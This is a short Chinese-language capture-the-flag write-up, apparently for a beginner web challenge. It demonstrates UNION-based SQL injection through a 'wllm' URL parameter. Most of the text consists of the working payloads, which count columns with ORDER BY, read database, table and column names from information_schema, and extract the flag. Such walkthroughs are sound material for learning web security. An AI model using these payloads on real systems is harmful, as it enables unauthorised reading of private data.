进入页面我们可以看到
让我们输入点东西如图:
然后我们可以在url栏上面看到参数是wllm
然后输入参数wllm=1回车如图:
下一步猜测字段输入:
?wllm=1 order by 1 -- asd
1,2,3...依次增加直到页面显示查询不到最终发现是三个字段
如图:(是查到第四个字段时查不到的结果)
下一步获取库名输入:?wllm=100' union select 1,database(),3 -- asd
回车如图:
得到库名为:test_db
下一步获取表名输入:
?wllm=100'union select 1, table_name,3 from information_schema.tables where table_schema='test_db' limit 0,1 -- asd
回车如图:(依次获取可知共有两个表)
下一步获取列名输入:
?wllm=100'union select 1, column_name,3 from information_schema.columns where table_schema='test_db'and table_name='test_tb'limit 0,1 -- asd
回车如图:(依次获取此表中的列名发现第二个字段便是flag我们直接找它里面的数据即可)
下一步直接获取flag中的数据即可
输入:
?wllm=100' union select 1,flag,3 from test_tb -- asd
回车如图:
得到flag将其提交即可
如图:
OVER!